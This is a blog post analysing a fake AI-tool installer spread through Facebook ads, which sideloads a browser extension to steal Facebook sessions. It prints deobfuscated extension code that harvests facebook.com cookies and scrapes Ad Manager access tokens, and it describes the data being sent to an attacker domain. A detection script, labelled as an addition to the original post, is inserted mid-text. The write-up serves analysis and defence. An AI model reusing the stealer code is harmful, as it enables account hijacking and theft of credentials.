Breakdown of The Ad Manager Scam: Hackers Stealing Facebook, Page and Ad Manager Information
I usually don’t write this type of blog, but one thing caught my eye while my younger brother was scrolling Facebook and I was sitting there enjoying memes. This ad on Facebook was pretty interesting and eye-catching.
So I told him to stop and hand over his PC so I could start researching what was going on here. After some Google searching I found that this scam is very popular in the Asia region, including Bangladesh, and that the campaign originates mostly from the Philippines and Vietnam.
Tools & Website I will use here:
Sample (download it at your own risk):
- Ai.Gemini Ultra v1.01 (Password: 2024)
Information of the scammers:
Research stage:
I downloaded the file and extracted it with the password.
Once that was done I used UniExtract2 to extract the file content from “setup.msi”.
When “setup.msi” runs, the first thing it executes is “install.cmd”, and install.cmd in turn executes “ru.ps1” from the “nmmhkkegccagdldgiimedpic” folder:
What “ru.ps1” does is try to forcefully close any open instances of Google Chrome, Microsoft Edge and Brave, without showing any error messages. After waiting 1 second, it looks up the path to the Google Chrome executable (where Chrome is installed) in the Windows registry. It then sets a variable called $et to the path of a Google Chrome extension; if the extension path doesn’t exist in the default location, it checks another location. It sets a variable called $urlToOpen to "https://bard.google.com/chat" and prepares a list of arguments to pass to the browser processes. These arguments load the Chrome extension, open a new window, and navigate to the specified URL.
If Google Chrome is installed on the system (checked via the $chromePath variable), it starts a new instance of Chrome with those arguments. Similarly, it checks whether Microsoft Edge and Brave are installed and, if so, starts new instances of them with the same arguments.
So, basically, it sideloads a fake extension into the browser.
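The launch chain described above (a script host force-closing the browsers, then relaunching them with --load-extension pointing at an unpacked folder plus --new-window and a target URL) is visible in process-creation telemetry. The following detection logic is an added example and is not part of the original post; the event tuples are constructed Sysmon-style records, not real logs, and the scoring thresholds are my own assumptions.

```python
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Matches --load-extension="quoted path" or --load-extension=unquoted-path
LOAD_EXT = re.compile(r'--load-extension=(?:"([^"]+)"|(\S+))', re.IGNORECASE)
ALERT_THRESHOLD = 2  # assumption: two or more indicators make it worth an alert

def sideloaded_extension(cmdline: str):
    """Return the unpacked-extension path if the browser was started with --load-extension."""
    m = LOAD_EXT.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None

def score_event(image: str, cmdline: str, parent_image: str) -> list:
    """Return the reasons a process-creation event resembles the ru.ps1 launch chain."""
    reasons = []
    if image.rsplit("\\", 1)[-1].lower() not in BROWSERS:
        return reasons
    path = sideloaded_extension(cmdline)
    if path is None:
        return reasons
    reasons.append(f"browser started with --load-extension={path}")
    if parent_image.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
        reasons.append(f"parent is a script host ({parent_image})")
    if re.search(r"\\(Temp|Downloads)\\", path, re.IGNORECASE):
        reasons.append("extension loaded from a temp/download location")
    if "--new-window" in cmdline:
        reasons.append("forced new window (matches the ru.ps1 argument list)")
    return reasons

def scan(events):
    """events: iterable of (timestamp, image, cmdline, parent_image). Returns alerts."""
    alerts = []
    for ts, image, cmdline, parent in events:
        reasons = score_event(image, cmdline, parent)
        if len(reasons) >= ALERT_THRESHOLD:
            alerts.append((ts, image, reasons))
    return alerts

# Constructed sample events (not real telemetry): the kill step, the malicious
# relaunch from PowerShell, a normal user launch, and a developer sideload.
SAMPLE_EVENTS = [
    ("2024-03-01T10:00:01", "C:\\Windows\\System32\\taskkill.exe",
     "taskkill /F /IM chrome.exe /IM msedge.exe /IM brave.exe", "powershell.exe"),
    ("2024-03-01T10:00:02", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     'chrome.exe --load-extension="C:\\Users\\u\\AppData\\Local\\Temp\\nmmhkkegccagdldgiimedpic" '
     '--new-window https://bard.google.com/chat', "powershell.exe"),
    ("2024-03-01T10:05:00", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "chrome.exe --profile-directory=Default", "explorer.exe"),
    ("2024-03-01T11:00:00", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "chrome.exe --load-extension=C:\\dev\\myext", "explorer.exe"),
]

if __name__ == "__main__":
    for ts, image, reasons in scan(SAMPLE_EVENTS):
        print(ts, image, "->", "; ".join(reasons))
```

Only the PowerShell-spawned relaunch crosses the threshold; the developer's own sideload from Explorer scores a single indicator and stays quiet.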
Inside background.js the code is obfuscated: https://pastebin.com/d4HiFp1e
I used a website that helps deobfuscate JavaScript, https://deobfuscate.io/; the deobfuscated code is here: https://pastebin.com/Lkewvt8K
When the browser starts with the extension loaded, it begins stealing the Facebook cookies:
// Collects every cookie for facebook.com and joins them into one "name=value;..." string
const getsss = () => {
    return new Promise((resolve, reject) => {
        chrome.cookies.getAll({url: "https://facebook.com"}, data => {
            const coo = data.map(e => {
                return "" + e.name + "=" + e.value + "";
            }).join(";");
            resolve(coo);
        });
    });
};
Another function, GetToken(), gathers the “access_token” from the Facebook Ad Manager page:
// Fetches the Ad Manager settings page and scrapes access_token and fb_dtsg out of the HTML.
// `o` is the request-options object defined elsewhere in the deobfuscated script (not shown here).
function GetToken(cook) {
    return new Promise(resolve => {
        fetch("https://www.facebook.com/ads/manager/account_settings/information/", o).then(req => {
            return req.text();
        }).then(responseHTML => {
            let startS = 'access_token:"';
            let endS = '"';
            let regex = new RegExp("" + startS + "(.*?)" + endS + "");
            let match = responseHTML.match(regex);
            let token_bm = match ? match[1] : null;
            let startS2 = '"token":"';
            let endS2 = '"';
            let fb_dtsg = responseHTML.match(new RegExp("(?<=" + startS2 + "+).*?(?=" + endS2 + ")", "gs"))[0];
            resolve({token_bm, fb_dtsg});
        }).catch(error => {
            // On failure the same request and scrape are simply retried once
            fetch("https://www.facebook.com/ads/manager/account_settings/information/", o).then(req => {
                return req.text();
            }).then(responseHTML => {
                let startS = 'access_token:"';
                let endS = '"';
                let regex = new RegExp("" + startS + "(.*?)" + endS + "");
                let match = responseHTML.match(regex);
                let token_bm = match ? match[1] : null;
                let startS2 = '"token":"';
                let endS2 = '"';
                let fb_dtsg = responseHTML.match(new RegExp("(?<=" + startS2 + "+).*?(?=" + endS2 + ")", "gs"))[0];
                resolve({token_bm, fb_dtsg});
            });
        });
    });
}
Now getsss() is called, and if the resulting cookie string coo does not contain c_user, execution stops there and no further task is performed.
The function above then retrieves various values through the Facebook Graph API using the access_token it collected earlier from the GetToken() function.
The attacker also gathers the user’s geolocation and keeps it in the msg variable, and finally sends all the data to a website called https://managedkv.com
This is all going on behind the scam. I did a whois search on the domain and found the Registrar Name: NetEarth One Inc. d/b/a NetEarth
The registrar NetEarth One Inc. d/b/a NetEarth also owns a domain named https://netearthone.com
Inside the root folder I found some Excel files of some users; those files contain page name and page likes.
MITRE ATT&CK techniques that might apply:
- T1059 — Command and Scripting Interpreter
- T1048 — Exfiltration Over Alternative Protocol
Conclusion:
Users should exercise caution while browsing the internet, especially when encountering unfamiliar files or websites. It is essential to have up-to-date antivirus software installed to detect and prevent potential threats. Additionally, users should avoid clicking on suspicious links or downloading files from untrusted sources to mitigate the risk of falling victim to scams or malware attacks.